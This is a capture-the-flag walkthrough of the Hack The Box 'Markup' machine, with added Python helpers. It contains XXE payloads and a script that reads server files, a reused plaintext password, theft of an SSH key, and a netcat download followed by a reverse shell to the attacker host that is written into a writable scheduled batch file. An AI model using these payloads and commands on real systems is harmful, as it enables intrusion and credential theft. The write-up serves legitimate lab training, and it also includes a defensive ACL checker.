HTB Starting Point – Markup

$ ./ennumeration.sh

[+] 10.10.10.49 scan started...
[-] Open ports : 22,80,443 found

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-31 17:27 CEST
Nmap scan report for 10.10.10.49
Host is up (0.071s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey:
|   3072 9f:a0:f7:8c:c6:e2:a4:bd:71:87:68:82:3e:5d:b7:9f (RSA)
|   256 90:7d:96:a9:6e:9e:4d:40:94:e7:bb:55:eb:b3:0b:97 (ECDSA)
|_  256 f9:10:eb:76:d4:6d:4f:3e:17:f3:93:d6:0b:8c:4b:81 (ED25519)
80/tcp  open  http     Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28
|_http-title: MegaShopping
443/tcp open  ssl/http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28
|_http-title: MegaShopping
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.67 seconds
[+] 10.10.10.49 scan finished...

Open ports:

  • 22/tcp open ssh OpenSSH for_Windows_8.1 (protocol 2.0)
  • 80/tcp open http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)
  • 443/tcp open ssl/http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)

$ gobuster dir -u http://10.10.10.49 -w /usr/share/wordlists/dirb/common.txt

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.49
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/05/31 18:13:48 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.hta (Status: 403)
/.htpasswd (Status: 403)
/aux (Status: 403)
/cgi-bin/ (Status: 403)
/com2 (Status: 403)
/com1 (Status: 403)
/com3 (Status: 403)
/con (Status: 403)
/images (Status: 301)
/Images (Status: 301)
/index.php (Status: 200)
/licenses (Status: 403)
/lpt1 (Status: 403)
/lpt2 (Status: 403)
/nul (Status: 403)
/phpmyadmin (Status: 403)
/prn (Status: 403)
/server-info (Status: 403)
/server-status (Status: 403)
/webalizer (Status: 403)
===============================================================
2020/05/31 18:15:21 Finished
===============================================================

Apache is serving a site on both 80 and 443, so let's look at it.

Browsing to http://10.10.10.49 shows the MegaShopping login page.

In the previous machine we found credentials stored in an SQL dump. Let's try to reuse them to log into the application.

The credentials daniel : >SNDv*2wzLWf are valid and let us into the application.

Foothold

Start Burp, log in, place an order and look at the intercepted request.

The order is sent to the server as an XML document, so the first thing to check is whether the parser resolves external entities (XXE).

An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server-side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.

https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing

Let's test whether it is vulnerable. The target is Windows, so we reference a file that exists there. Two details matter: the entity must actually be referenced (&xxe;) in the document body, otherwise it is declared but never expanded; and boot.ini only exists on legacy Windows (Vista and later keep boot settings in the BCD store), so C:\Windows\win.ini is the usual test file on a modern host.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]>
<order>&xxe;</order>

It works: the contents of the file are reflected in the response.

The services.php source code reveals the username daniel.

Port 22 is open, so SSH is a candidate for a foothold. On Windows, OpenSSH keeps a user's private key at C:\Users\<username>\.ssh\id_rsa.

Since we already have an XXE file read, let's use it to fetch daniel's key: the key is plain text, so a plain file:// entity returns it intact.
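Added example (Python, not part of the original post) that serves the three reads above: the boot.ini test, the services.php source and daniel's key. A plain file:// entity is enough for text files such as win.ini or an SSH key, but PHP source starts with <?php, which the parser treats as markup once the entity is expanded, so the source never comes back intact; wrapping the path in php://filter/convert.base64-encode/ returns it as one base64 token that can be decoded afterwards. The endpoint URL /process.php, the assumption that the server reflects the <order> text in its response, the XAMPP web root C:\xampp\htdocs and the sample response are assumptions made for the demo.

```python
"""XXE file-read helper: build the payload and decode what the server reflects.

Added example, not the original post's code.  Assumptions: the order is POSTed
to /process.php, the server echoes the <order> text back in its HTML response,
and services.php sits in XAMPP's default web root C:\\xampp\\htdocs.
"""
import base64
import re
import urllib.request

# The post's payload with the entity actually referenced in the body: without
# &xxe; the entity is declared but never expanded, and nothing is read.
XXE_TEMPLATE = (
    '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
    "<!DOCTYPE foo [\n"
    "  <!ELEMENT foo ANY >\n"
    '  <!ENTITY xxe SYSTEM "{resource}" >]>\n'
    "<order>&xxe;</order>"
)


def build_payload(path, php_filter=False):
    """Return an XXE document that reads `path` on the server.

    file:// is fine for text such as win.ini or an SSH private key.  PHP source
    starts with '<?php', which the XML parser treats as markup (a processing
    instruction) once the entity is expanded, so the source never comes back
    intact; php://filter base64-encodes the file before expansion and it
    arrives as one safe token.
    """
    path = path.replace("\\", "/")
    if php_filter:
        resource = "php://filter/convert.base64-encode/resource=" + path
    else:
        resource = "file:///" + path.lstrip("/")
    return XXE_TEMPLATE.format(resource=resource)


_B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def extract_base64(response_text):
    """Decode the longest base64 run in the reflected response."""
    tokens = _B64_TOKEN.findall(response_text)
    if not tokens:
        raise ValueError("no base64 blob reflected in the response")
    return base64.b64decode(max(tokens, key=len))


def send_order(url, payload, timeout=10.0):
    """POST the payload as the order body (live request; not used offline)."""
    req = urllib.request.Request(
        url, data=payload.encode("latin-1"),
        headers={"Content-Type": "text/xml"}, method="POST",
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


# Constructed sample of a reflected php://filter read.  The "source" is invented
# for the demo; it is not the real services.php.
SAMPLE_SOURCE = b'<?php\n$username = "daniel";\n$password = "REDACTED";\n'
SAMPLE_RESPONSE = (
    "<p>Your order for "
    + base64.b64encode(SAMPLE_SOURCE).decode()
    + " has been processed</p>"
)

if __name__ == "__main__":
    print(build_payload("C:\\Windows\\win.ini"))
    print(build_payload("C:\\xampp\\htdocs\\services.php", php_filter=True))
    # Live use: send_order("http://10.10.10.49/process.php", payload)
    print(extract_base64(SAMPLE_RESPONSE).decode())
```

Against the real target you would pass the payload from build_payload to send_order and feed the HTML that comes back to extract_base64; with php_filter=False the key or win.ini is readable directly in the response.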

Save the returned key as id_rsa, restrict its permissions (ssh refuses a key that is readable by other users) and log in:

chmod 400 id_rsa
ssh -i id_rsa daniel@10.10.10.49

daniel@MARKUP C:\Users\daniel\Desktop>dir

Volume in drive C has no label.
Volume Serial Number is 4C8E-E2DC

Directory of C:\Users\daniel\Desktop

03/05/2020  07:18 AM    <DIR>          .
03/05/2020  07:18 AM    <DIR>          ..
03/05/2020  07:18 AM                35 user.txt    
               1 File(s)             35 bytes      
               2 Dir(s)  13,747,978,240 bytes free

daniel@MARKUP C:\Users\daniel\Desktop>type user.txt

032dXXXXXXXXXXXXXXXXXXXXXXXXXXXX 

Privilege escalation

daniel@MARKUP C:\>dir

Volume in drive C has no label.
Volume Serial Number is 4C8E-E2DC

Directory of C:\

03/12/2020  03:56 AM    <DIR>          Log-Management
09/15/2018  12:12 AM    <DIR>          PerfLogs
03/05/2020  05:35 AM    <DIR>          Program Files
09/15/2018  12:21 AM    <DIR>          Program Files (x86)
03/05/2020  05:40 AM    <DIR>          Users
03/05/2020  01:23 AM    <DIR>          Windows
03/05/2020  10:15 AM    <DIR>          xampp
               0 File(s)              0 bytes
               7 Dir(s)  13,744,549,888 bytes free

daniel@MARKUP C:\Log-Management>dir

Volume in drive C has no label.
Volume Serial Number is 4C8E-E2DC

Directory of C:\Log-Management

03/12/2020  03:56 AM    <DIR>          .
03/12/2020  03:56 AM    <DIR>          ..
03/06/2020  02:42 AM               346 job.bat
               1 File(s)            346 bytes
               2 Dir(s)  13,745,532,928 bytes free

daniel@MARKUP C:\Log-Management>job.bat

You must run this script as an Administrator!
Connection to 10.10.10.49 closed.

daniel@MARKUP C:\Log-Management>type job.bat

@echo off
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
echo.
echo Event Logs have been cleared!
goto theEnd
:do_clear
wevtutil.exe cl %1
goto :eof
:noAdmin
echo You must run this script as an Administrator!
:theEnd
exit

Reading the script: it calls bcdedit, which prints "Access is denied." when not run elevated, and uses the first word of that output as its administrator test. When elevated it iterates over every log name returned by wevtutil el and clears each one with wevtutil cl. Either way it ends with exit, which is why running it over SSH as daniel also terminated the session. Clearing all event logs is only useful from a privileged context, so this is presumably run periodically as an administrator, which makes its permissions worth checking.

Icacls

Displays or modifies discretionary access control lists (DACLs) on specified files, and applies stored DACLs to files in specified directories.

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/icacls

daniel@MARKUP C:\Log-Management>icacls job.bat

job.bat BUILTIN\Users:(F)
        NT AUTHORITY\SYSTEM:(I)(F)
        BUILTIN\Administrators:(I)(F)
        BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

The icacls output shows two ACEs for BUILTIN\Users: an inherited one, (I)(RX), that only allows read and execute, and an explicit one, (F), that grants full control, which includes writing to the file. BUILTIN\Users contains every local account, daniel included, so daniel can overwrite job.bat even though the script itself only does anything useful when run elevated.

A built-in group. After the initial installation of the operating system, the only member is the Authenticated Users group. When a computer joins a domain, the Domain Users group is added to the Users group on the computer.
Users can perform tasks such as running applications, using local and network printers, shutting down the computer, and locking the computer.
Users can install applications that only they are allowed to use if the installation program of the application supports the per-user installation.
This group cannot be renamed, deleted, or moved.
Default User Rights: None

https://ss64.com/nt/syntax-security_groups.html
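An added example (Python, not from the original post) of the check a practitioner would script on top of icacls: parse a listing and flag any ACE that gives a low-privilege group such as BUILTIN\Users a right that allows modifying the file. It runs here on the post's own job.bat listing, embedded as a constructed string, and on a constructed listing of what job.bat should look like after the explicit BUILTIN\Users grant is removed with icacls job.bat /remove:g BUILTIN\Users (that expected post-fix output is an assumption).

```python
"""Spot files that a low-privilege user can overwrite, from icacls output.

Added example, not the original post's code.  SAMPLE_ICACLS is the post's own
icacls listing for job.bat, embedded as a constructed string; FIXED_ICACLS is
what the listing is expected to look like once the explicit BUILTIN\\Users ACE
is removed (an assumption, included for the check's negative case).
"""
import re

# Groups every local account (daniel included) ends up in.
LOW_PRIV_PRINCIPALS = {
    "BUILTIN\\Users",
    "Everyone",
    "NT AUTHORITY\\Authenticated Users",
    "NT AUTHORITY\\INTERACTIVE",
}

# icacls simple rights (F, M, W, D) and specific rights (WD, AD, WDAC, WO) that
# let the holder change the file or its ACL; rewriting the DACL or taking
# ownership is as good as write access.
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WDAC", "WO"}

# One ACE per line.  The first ACE of a file shares the line with the path, the
# rest are indented to the same column.  The principal is recognised by its
# well-known domain prefix or a single DOMAIN\name token; the path is whatever
# precedes it (use absolute paths to keep this unambiguous).
_ACE = re.compile(
    r"^(?P<path>.*?)\s*"
    r"(?P<who>(?:NT AUTHORITY|NT SERVICE|BUILTIN|CREATOR OWNER|[^\s\\:]+)"
    r"(?:\\[^:\\]+)?)"
    r":(?P<aces>(?:\([A-Z,]*\))+)\s*$"
)


def parse_icacls(output):
    """Yield (path, principal, inherited, rights) for every ACE in the output."""
    path = None
    for line in output.splitlines():
        m = _ACE.match(line)
        if not m:                      # blank line or the trailing summary
            continue
        if m.group("path"):
            path = m.group("path")
        groups = re.findall(r"\(([^)]*)\)", m.group("aces"))
        flags, rights = groups[:-1], set(groups[-1].split(","))
        yield path, m.group("who"), "I" in flags, rights


def find_writable(output, principals=LOW_PRIV_PRINCIPALS):
    """Return ACEs that hand write-equivalent rights to a low-privilege group.

    Inherited ACEs are reported too: (I)(RX) from C:\\ is harmless, but an
    inherited (I)(F) from a world-writable parent directory is not.
    """
    return [
        (path, who, rights, inherited)
        for path, who, inherited, rights in parse_icacls(output)
        if who in principals and rights & WRITE_RIGHTS
    ]


# The post's listing for job.bat, as a constructed string.
SAMPLE_ICACLS = """job.bat BUILTIN\\Users:(F)
        NT AUTHORITY\\SYSTEM:(I)(F)
        BUILTIN\\Administrators:(I)(F)
        BUILTIN\\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

# Assumed listing after: icacls job.bat /remove:g BUILTIN\Users
FIXED_ICACLS = """job.bat NT AUTHORITY\\SYSTEM:(I)(F)
        BUILTIN\\Administrators:(I)(F)
        BUILTIN\\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

if __name__ == "__main__":
    for path, who, rights, inherited in find_writable(SAMPLE_ICACLS):
        how = "inherited" if inherited else "explicit"
        print(f"{path}: {who} has {','.join(sorted(rights))} ({how})")
    print("after fix:", find_writable(FIXED_ICACLS))
```

Feeding it the output of icacls C:\Log-Management\* or icacls C:\xampp /t would surface the same class of problem across a whole tree, which is the quicker way to find the next writable script that a privileged task executes.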

We can get a shell by copying netcat to the box and replacing the script's contents with a reverse-shell command. Serve nc.exe from the attack machine (the HTTP server must be started in the directory that holds the binary):

$ cp /usr/share/windows-binaries/nc.exe ~/htb/markup/
$ cd ~/htb/markup && python3 -m http.server 8000

daniel@MARKUP C:\Users\daniel>curl http://10.10.14.9:8000/nc.exe -o c:\users\daniel\nc.exe

  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 59392  100 59392    0     0  59392      0  0:00:01 --:--:--  0:00:01  132k

daniel@MARKUP C:\Users\daniel>echo C:\Users\daniel\nc.exe -e cmd.exe 10.10.14.9 1234 > C:\Log-Management\job.bat

A single > truncates the file, so the script is replaced rather than appended to. Appending would not work: the original ends with exit, so anything placed after it never runs. With a listener waiting on the attack machine (nc -lvnp 1234), the next run of the scheduled job should deliver a reverse shell with Administrator privileges.

C:\Users>cd Administrator
C:\Users\Administrator>cd Desktop
C:\Users\Administrator\Desktop>dir

Volume in drive C has no label.
Volume Serial Number is 4C8E-E2DC

Directory of C:\Users\Administrator\Desktop

03/05/2020  07:33 AM    <DIR>          .
03/05/2020  07:33 AM    <DIR>          ..
03/05/2020  07:33 AM                70 root.txt
               1 File(s)             70 bytes
               2 Dir(s)  13,453,561,856 bytes free

C:\Users\Administrator\Desktop>type root.txt

f574XXXXXXXXXXXXXXXXXXXXXXXXXXXX
